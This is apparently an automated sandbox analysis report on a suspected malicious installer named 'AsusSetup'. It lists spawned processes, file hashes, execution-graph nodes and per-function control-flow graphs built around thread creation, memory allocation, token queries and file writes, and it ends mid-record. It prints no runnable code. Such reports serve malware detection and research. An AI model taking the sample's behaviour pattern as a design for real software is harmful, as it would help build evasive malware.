                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:05
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0EC424B89B232FD9D839942FBC5274E2
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:08
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'512'448 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:DF7731CD51167F1E9F73863D919CAC1B
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:11.9%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:98.1%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:1.4%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:213
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:30
                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 5639 2068f40 SetFilePointerEx 5640 2068b45 5639->5640 5641 2068dcc 5639->5641 5644 20689b8 5640->5644 5645 2068f41 SetFilePointerEx 5640->5645 5643 2069180 SetFilePointerEx 5641->5643 5646 2068f2c 5641->5646 5642 2068fab SetFilePointerEx 5642->5644 5648 20689ac 5642->5648 5643->5646 5644->5641 5644->5642 5647 206a380 SetFilePointerEx 5644->5647 5644->5648 5645->5640 5645->5641 5647->5644 5648->5648 5746 2068201 5748 2068220 5746->5748 5749 20681e5 5746->5749 5747 206830b CloseHandle 5747->5749 5749->5747 5750 2068357 GetTokenInformation 5749->5750 5751 2068334 5749->5751 5752 2068212 GetTokenInformation 5749->5752 5750->5749 5752->5748 5752->5749 5649 2068a0e 5650 2068a16 5649->5650 5651 2068ee8 SetFilePointerEx 5649->5651 5650->5651 5652 2068a1c 5650->5652 5651->5652 5653 2065b8f 5665 20753f0 5653->5665 5655 2065baf 5670 20681c0 5655->5670 5657 2065c2c 5658 2065c85 5677 2065990 5658->5677 5660 2065dcd 5660->5660 5661 2065c20 5661->5657 5661->5658 5664 2065bbc 5661->5664 5662 2065cd4 CreateThread CloseHandle 5662->5664 5663 2065d56 CreateThread 5663->5664 5664->5657 5664->5662 5664->5663 5666 20753f4 5665->5666 5667 207545e VirtualAlloc 5666->5667 5669 20753f6 5666->5669 5668 2075460 5667->5668 5668->5666 5669->5655 5673 20681e5 5670->5673 5671 206830b CloseHandle 5671->5673 5672 2068357 GetTokenInformation 5672->5673 5673->5671 5673->5672 5674 2068212 GetTokenInformation 5673->5674 5675 2068334 5673->5675 5674->5673 5676 2068220 5674->5676 5675->5661 5676->5661 5679 2065994 _invalid_parameter_noinfo wcscpy 5677->5679 5678 2065a23 5678->5660 5679->5678 5680 2065a8d VirtualAlloc 5679->5680 5680->5679 5681 206950d 5682 2069512 5681->5682 5683 2069529 5682->5683 5684 206954a SetFilePointerEx 5682->5684 5685 2069648 SetFilePointerEx 5682->5685 5683->5683 5684->5682 5685->5682 5694 2066149 5695 20661b5 5694->5695 5698 2066155 5694->5698 5696 206615c SetFilePointerEx 5695->5696 5697 20661cf ReadFile 5695->5697 5700 20661f0 5696->5700 5697->5698 5700->5698 5701 20661f5 VirtualAlloc 5700->5701 5701->5698 5782 1401cacb4 5785 1401cb8f4 5782->5785 5786 1401cacbd 5785->5786 5787 1401cb917 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5785->5787 5787->5786 5707 2068690 5708 2068699 5707->5708 5712 20686a1 5707->5712 5710 206d7d3 5708->5710 5708->5712 5709 206d84a SetFilePointerEx 5709->5710 5710->5709 5713 2068736 5710->5713 5712->5713 5714 206ec30 5712->5714 5715 206ec34 5714->5715 5716 206eca5 VirtualAlloc 5715->5716 5717 206ec70 5716->5717 5717->5712 5718 20692d0 5721 20691d3 5718->5721 5719 2069311 5720 20692cc SetFilePointerEx 5720->5721 5721->5719 5721->5720 5835 2065d50 CreateThread 5839 2065bbc 5835->5839 5836 2065cd4 CreateThread CloseHandle 5836->5839 5837 2065c2c 5838 2065d56 CreateThread 5838->5839 5839->5836 5839->5837 5839->5838 5737 20694de 5740 20694ed 5737->5740 5738 2069648 SetFilePointerEx 5738->5740 5739 206954a SetFilePointerEx 5739->5740 5740->5738 5740->5739 5741 2069529 5740->5741 5788 20658de 5789 20753f0 VirtualAlloc 5788->5789 5790 20658f9 5789->5790 5791 20681c0 3 API calls 5790->5791 5792 2065907 5791->5792 5793 20692dd 5794 20692cc SetFilePointerEx 5793->5794 5795 20691d3 5793->5795 5794->5795 5795->5794 5796 2069311 5795->5796 5742 206919a ReadFile 5743 20691d3 5742->5743 5744 2069311 5743->5744 5745 20692cc SetFilePointerEx 5743->5745 5745->5743 5753 2068e1a 5754 2068b45 5753->5754 5755 2068f41 SetFilePointerEx 5754->5755 5757 2068dcc 5754->5757 5762 20689b8 5754->5762 5755->5754 5755->5757 5756 2068fab SetFilePointerEx 5761 20689ac 5756->5761 5756->5762 5758 2069180 SetFilePointerEx 5757->5758 5759 2068f2c 5757->5759 5758->5759 5760 206a380 SetFilePointerEx 5760->5762 5761->5761 5762->5756 5762->5757 5762->5760 5762->5761 5840 206615a 5841 206615c SetFilePointerEx 5840->5841 5843 20661f0 5841->5843 5842 20661eb 5843->5842 5844 20661f5 VirtualAlloc 5843->5844 5844->5842 5606 2068ba6 5607 2069049 5606->5607 5608 2068b33 WriteFile 5607->5608 5609 2069059 5607->5609 5610 2068b45 5608->5610 5609->5609 5612 2068f41 SetFilePointerEx 5610->5612 5618 20689b8 5610->5618 5611 2068fab SetFilePointerEx 5615 20689ac 5611->5615 5611->5618 5612->5610 5613 2068dcc 5612->5613 5617 2068f2c 5613->5617 5623 2069180 5613->5623 5615->5615 5618->5611 5618->5613 5618->5615 5619 206a380 5618->5619 5620 206a386 5619->5620 5622 206a3a3 5619->5622 5621 206a64e SetFilePointerEx 5620->5621 5620->5622 5621->5622 5622->5618 5624 20691d3 5623->5624 5625 20692cc SetFilePointerEx 5624->5625 5626 2069311 5624->5626 5625->5624 5626->5617 5627 20683e7 5630 20681e5 5627->5630 5628 206830b CloseHandle 5628->5630 5629 2068212 GetTokenInformation 5629->5630 5633 2068220 5629->5633 5630->5628 5630->5629 5631 2068334 5630->5631 5632 2068357 GetTokenInformation 5630->5632 5632->5630 5845 2068964 5846 2068969 5845->5846 5847 2069c70 VirtualFree 5846->5847 5848 2068977 5847->5848 5634 2069625 SetFilePointerEx 5637 2069512 5634->5637 5635 206954a SetFilePointerEx 5635->5637 5636 2069529 5637->5635 5637->5636 5638 2069648 SetFilePointerEx 5637->5638 5638->5637 5816 2068722 5818 20686a7 5816->5818 5817 206ec30 VirtualAlloc 5817->5818 5818->5817 5819 2068736 5818->5819 5820 2065d22 5821 2065cd4 CreateThread CloseHandle 5820->5821 5824 2065bbc 5820->5824 5821->5824 5822 2065c2c 5823 2065d56 CreateThread 5823->5824 5824->5821 5824->5822 5824->5823 5877 20681e3 5880 20681e5 5877->5880 5878 2068357 GetTokenInformation 5878->5880 5879 206830b CloseHandle 5879->5880 5880->5878 5880->5879 5881 2068212 GetTokenInformation 5880->5881 5882 2068334 5880->5882 5881->5880 5883 2068220 5881->5883 5686 2068faa SetFilePointerEx 5687 20689ac 5686->5687 5689 20689b8 5686->5689 5688 206a380 SetFilePointerEx 5688->5689 5689->5687 5689->5688 5690 2068fab SetFilePointerEx 5689->5690 5691 2068dcc 5689->5691 5690->5687 5690->5689 5692 2069180 SetFilePointerEx 5691->5692 5693 2068f2c 5692->5693 5693->5693 5849 2068b76 5853 20689b8 5849->5853 5850 2068fab SetFilePointerEx 5852 20689ac 5850->5852 5850->5853 5851 206a380 SetFilePointerEx 5851->5853 5852->5852 5853->5850 5853->5851 5853->5852 5854 2068dcc 5853->5854 5855 2069180 SetFilePointerEx 5854->5855 5856 2068f2c 5855->5856 5856->5856 5825 2068b33 WriteFile 5826 2068b45 5825->5826 5828 2068f41 SetFilePointerEx 5826->5828 5832 20689b8 5826->5832 5827 2068fab SetFilePointerEx 5831 20689ac 5827->5831 5827->5832 5828->5826 5829 2068dcc 5828->5829 5833 2069180 SetFilePointerEx 5829->5833 5834 2068f2c 5829->5834 5830 206a380 SetFilePointerEx 5830->5832 5831->5831 5832->5827 5832->5829 5832->5830 5832->5831 5833->5834 5722 2068931 5723 206893c 5722->5723 5724 2068965 5723->5724 5725 20689b8 5723->5725 5727 2068977 5723->5727 5733 2069c70 5724->5733 5725->5727 5728 2068fab SetFilePointerEx 5725->5728 5729 2068dcc 5725->5729 5731 206a380 SetFilePointerEx 5725->5731 5728->5725 5728->5727 5730 2069180 SetFilePointerEx 5729->5730 5732 2068f2c 5730->5732 5731->5725 5732->5732 5734 2069c9b 5733->5734 5735 2069d93 VirtualFree 5734->5735 5736 2069d97 5735->5736 5736->5727 5869 2068db8 5870 2068dc6 5869->5870 5871 2068969 5869->5871 5870->5871 5873 2068dcc 5870->5873 5872 2069c70 VirtualFree 5871->5872 5875 2068977 5872->5875 5874 2069180 SetFilePointerEx 5873->5874 5876 2068f2c 5874->5876 5876->5876

                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                          Function 02065346 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54c2962d612a0009d705810c32f8bea43cb8044ce8e2847ea9288bee0de58304
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4107A250DBA58FC36746245CAC3B96ED09B12A6AFCD01D7D4C3DB4E2E3894944F327
                                                                                                                                                                                                                                                                                                                                                                                          Function 020681C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 20681c0-20681d8 1 20683bf-20683ca 0->1 3 2068277-206827a 1->3 4 20683d0 1->4 6 2068241 3->6 7 206827c 3->7 4->3 5 20683d6 4->5 8 2068376-206837b 6->8 9 2068251-2068256 call 20972f4 6->9 7->6 10 206827e 7->10 11 20682f0-206831c 8->11 12 2068381 8->12 18 206825b-2068260 9->18 14 2068284 10->14 15 206830b-2068311 CloseHandle 10->15 30 20681e5 11->30 31 2068322 11->31 12->11 16 2068387 12->16 19 206832e-2068330 14->19 15->19 16->3 20 2068390-2068393 16->20 18->20 21 2068332 19->21 22 20682dd-20682e3 19->22 20->10 23 2068399 20->23 21->22 27 2068334 21->27 24 20683a3-20683a4 22->24 25 20682e9 22->25 23->10 28 206839f-20683a1 23->28 25->24 29 20682ef 25->29 32 206f524-206f52e 27->32 28->24 29->11 35 20682a3-20682a5 30->35 36 20681eb 30->36 31->30 33 2068328-206832c 31->33 34 206f807 32->34 33->19 37 20682c5-20682c8 33->37 38 206f8df-206f8e0 34->38 39 206f80d 34->39 40 20682ab 35->40 41 20683f9 35->41 42 20682b2-20682bc 36->42 43 20681f1 36->43 37->41 44 20682ce 37->44 51 20715a5-20715aa 38->51 39->38 45 206f813 39->45 40->41 46 20682b1 40->46 47 20682d2-20682d7 41->47 48 20683ff 41->48 42->37 50 2068357-206836f GetTokenInformation 42->50 43->42 49 20681f7 43->49 52 20682d0 44->52 53 206828f-2068303 call 20972ec 44->53 58 206f78f 45->58 59 206f81b 45->59 46->42 54 2068306-2068309 47->54 48->32 56 206828e 49->56 50->8 57 20715ae-20715af 51->57 52->47 52->53 53->54 66 206834f-2068355 53->66 54->15 54->19 56->53 61 20715b2-20715b7 57->61 58->59 62 206f795 58->62 59->38 64 20715ba-20715c1 61->64 62->34 67 20715c7-20715d2 64->67 68 2071750-2071763 call 20972f4 64->68 76 2068212-206821a GetTokenInformation 66->76 77 2068341 66->77 70 20715d4-20715d6 67->70 71 2071620-2071623 67->71 73 2071768-20717a2 68->73 74 2071670-2071684 70->74 75 20715dc-20715df 70->75 78 2071625-2071628 71->78 79 20716a0-20716b4 71->79 74->51 80 207168a-207168d 74->80 75->64 83 20715e1-20715f6 75->83 86 2068220-2068234 76->86 87 20683af 76->87 77->76 84 2068347 77->84 78->64 85 207162a-2071636 78->85 81 20716b6-20716b9 79->81 82 20716f4-20716f5 79->82 90 2071693-2071697 80->90 91 207172f-2071738 80->91 92 20716bb 81->92 93 207173a-207173b 81->93 105 20716fe-207170c 82->105 94 20716d2-20716d7 83->94 95 20715fc-2071600 83->95 96 206834d 84->96 97 2071638-2071640 84->97 85->97 98 20716dc-20716ec 85->98 111 20683d7-20683dd 86->111 112 206823a 86->112 87->9 89 20683b5 87->89 89->9 102 20683bb-20683bd 89->102 103 20716bf-20716cd 90->103 101 207173f-2071740 91->101 92->103 93->101 94->57 104 2071606-2071618 95->104 95->105 96->66 99 2071646-207165f 97->99 100 207170e-2071727 97->100 98->67 106 20716f2 98->106 99->67 108 2071665 99->108 100->67 107 207172d 100->107 109 2071744-2071748 101->109 102->1 104->61 105->109 106->68 107->68 108->68 112->111 113 2068240 112->113 114 207b32e-207b330 113->114 116 207b332-207b337 call 20972f4 114->116 117 207b300 114->117 116->117 123 207b339 116->123 121 207b302 117->121 122 207b2fd 117->122 124 207b305 122->124 125 207b2ff 122->125 123->117 126 207b33b-207b33f 123->126 127 207b308-207b315 124->127 128 207b322-207b32d 124->128 125->127 126->127 127->124 130 207b317 127->130 128->114 130->122
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7367b35715abc355b6f41ceb62380859bc036bc7819537d2e9f1ae8884f26296
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B1393091CF468BCB6ACF1C84C8279F7E2FF95318F18C259D48B875A5DB24984AE356
                                                                                                                                                                                                                                                                                                                                                                                          Function 02065B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 131 2065b8f-2065c20 call 20753f0 call 2098358 call 2080320 call 20681c0 141 2065c26 131->141 142 2065cf4-2065d08 call 20972ec 131->142 141->142 143 2065c2c-2065c2f 141->143 146 2065c87-2065dc8 call 2065e60 call 2065990 142->146 147 2065d0e 142->147 161 2065dcd 146->161 147->146 149 2065d14-2065d18 147->149 153 2065c65 149->153 154 2065daf-2065db6 call 20652d0 149->154 157 2065c67 153->157 158 2065ca3 call 2065df0 153->158 163 2065c30-2065c39 154->163 164 2065dbc 154->164 157->158 162 2065c69-2065c72 157->162 171 2065c45-2065d6d call 2081520 158->171 161->161 166 2065c97-2065c9d 162->166 167 2065c78 162->167 187 2065bf7 163->187 188 2065cb9-2065cbd 163->188 168 2065dbe 164->168 169 2065d7d-2065d89 164->169 181 2065c85 166->181 182 2065c9f 166->182 172 2065c7e 167->172 173 2065d1f-2065d45 167->173 168->169 186 2065d9b 168->186 183 2065d94 169->183 184 2065d8b-2065d92 169->184 197 2065bfd-2065c06 171->197 199 2065d73 171->199 172->173 174 2065c84 172->174 190 2065d47 173->190 191 2065cd4-2065cea CreateThread CloseHandle 173->191 189 2065ca9-2065cad 174->189 181->146 182->181 192 2065ca1 182->192 183->189 184->183 195 2065d9c 184->195 186->195 187->188 187->197 193 2065d56-2065d5b CreateThread 188->193 194 2065cc3 188->194 189->143 198 2065cb3 189->198 190->191 191->184 201 2065cf0-2065d4d 191->201 192->158 193->167 194->193 200 2065cc9 194->200 205 2065da5-2065da8 195->205 197->205 198->143 198->188 199->197 203 2065d79-2065d7b 199->203 200->193 201->183 203->169 205->154
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d708910f3b4671d53bdfd58343c096629a3b1fe752a9bf05054126c60a61e167
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 497e48ca3ea8842201cf593ba33d95d1dcbc3372a8dac9ddb7560834a3c201a3
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d708910f3b4671d53bdfd58343c096629a3b1fe752a9bf05054126c60a61e167
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A41B530618B098FDBBA97289C5C77D6EE2EB49324FC8016AD447CB1E1DB658405FB52
                                                                                                                                                                                                                                                                                                                                                                                          Function 02065D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 207 2065d22-2065d45 208 2065d47 207->208 209 2065cd4-2065cea CreateThread CloseHandle 207->209 208->209 210 2065cf0-2065d4d 209->210 211 2065d8b-2065d92 209->211 213 2065d94 210->213 211->213 214 2065d9c 211->214 216 2065ca9-2065cad 213->216 219 2065da5-2065db6 call 20652d0 214->219 217 2065cb3 216->217 218 2065c2c-2065c2f 216->218 217->218 220 2065cb9-2065cbd 217->220 231 2065c30-2065c39 219->231 232 2065dbc 219->232 222 2065d56-2065d5b CreateThread 220->222 223 2065cc3 220->223 228 2065c7e 222->228 229 2065d1f-2065d45 222->229 223->222 225 2065cc9 223->225 225->222 228->229 230 2065c84 228->230 229->208 229->209 230->216 231->220 241 2065bf7 231->241 234 2065dbe 232->234 235 2065d7d-2065d89 232->235 234->235 240 2065d9b 234->240 235->211 235->213 240->214 241->220 242 2065bfd-2065c06 241->242 242->219
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 981c095f1889b1594a7e35529451da1f7520dd6dec6efb3f734e2cd2dd117af1
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDF0F02061CB0589DBBE87388C5D33E6ED2AB89134FD40B2EC097C90E0EB358101F209
                                                                                                                                                                                                                                                                                                                                                                                          Function 020694DE Relevance: 3.2, APIs: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 244 20694de-20694f8 call 20972ec 247 20694fe 244->247 248 2069648-2069656 SetFilePointerEx 244->248 247->248 249 2069504-2069508 247->249 250 20696fd 248->250 251 20695ae-20695bf call 206ebe0 249->251 252 20697c5 250->252 253 2069703 250->253 251->252 267 20695c5-20699db 251->267 256 20696ef-20696f7 252->256 257 20697cb 252->257 254 2069979-2069982 253->254 259 2069734-2069735 254->259 260 2069988 254->260 256->250 258 2069759 256->258 257->256 262 20697d1 257->262 265 206975f 258->265 266 206959c-20695a2 SetFilePointerEx 258->266 263 206973e 259->263 260->259 264 206998e 260->264 262->263 263->252 264->264 265->266 269 2069765 265->269 273 20698c5 266->273 271 2069832-2069834 267->271 272 20699e1 267->272 274 2069776-2069783 269->274 271->252 275 2069836-206983a 271->275 272->271 278 20699e7-20699ed 272->278 276 20698c7-20698d0 273->276 277 206985c-206985f 273->277 279 2069785 274->279 280 206973f-2069754 call 206ea60 274->280 275->274 281 20698d6 276->281 282 2069968-2069970 call 206eb00 276->282 284 2069847-206984f 277->284 285 2069861 277->285 283 2078d17-2078d1c 278->283 279->280 287 2069787 279->287 299 2069874 280->299 281->282 290 20698dc 281->290 282->254 282->277 288 2069855 284->288 289 2069512-206951d 284->289 291 2069867 285->291 292 2069570-2069637 call 20972f4 285->292 297 20697b2 287->297 288->297 295 2069523 289->295 296 206986d 289->296 302 2069913-20699d0 290->302 291->292 291->296 307 206963c 292->307 295->296 301 2069529 295->301 296->299 297->252 299->302 303 206987a 299->303 301->283 311 20698b4 302->311 312 20699a5 302->312 303->302 306 2069880-2069882 303->306 309 2069884 306->309 307->284 310 2069642 307->310 310->248 310->284 311->309 314 20698b6 311->314 312->311 313 20699ab 312->313 313->282 315 20698bc 314->315 316 2069718 314->316 315->273 316->259
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8a774f80b67d0f7a9aff682db143e676912666a894dd1733a18b9de08e71f15
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d39fcd5ff8a9e6aa57df03f7ebd9379bdc5d67ce4ae5e7d323f7d283ee36533
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a774f80b67d0f7a9aff682db143e676912666a894dd1733a18b9de08e71f15
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB41D431A1C74D8FDBBA4A2C885C77E73D1BB85614F084A1E9057C7D90EB358802F752
                                                                                                                                                                                                                                                                                                                                                                                          Function 02066149 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 318 2066149-2066152 319 20661b5-20661cb 318->319 320 2066155 318->320 321 206615c-206622c SetFilePointerEx 319->321 322 20661cd 319->322 323 2066244 320->323 324 206615b 320->324 331 2066220-2066226 321->331 332 206622e-206623b 321->332 322->321 325 20661cf-20661e7 ReadFile 322->325 329 2066240 323->329 330 20661ac 323->330 328 20661ff-2066203 324->328 345 20661eb-20661ef 325->345 348 2066189 325->348 328->323 334 2066205 328->334 329->331 341 206621b call 20972f4 329->341 330->329 335 20661b2 330->335 339 20661fc 331->339 340 2066228 331->340 336 20661f0 call 20972ec 332->336 337 206623d 332->337 334->320 342 206618e 335->342 349 20661f5 VirtualAlloc 336->349 337->336 343 206623f 337->343 339->345 347 20661fa 340->347 341->331 350 2066190 342->350 343->329 347->339 348->350 352 206618b 348->352 349->347 350->323 351 2066194-206620b 350->351 355 2066215 351->355 356 206620d-2066213 351->356 352->350 354 206618d 352->354 354->342 355->328 356->323 356->355
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
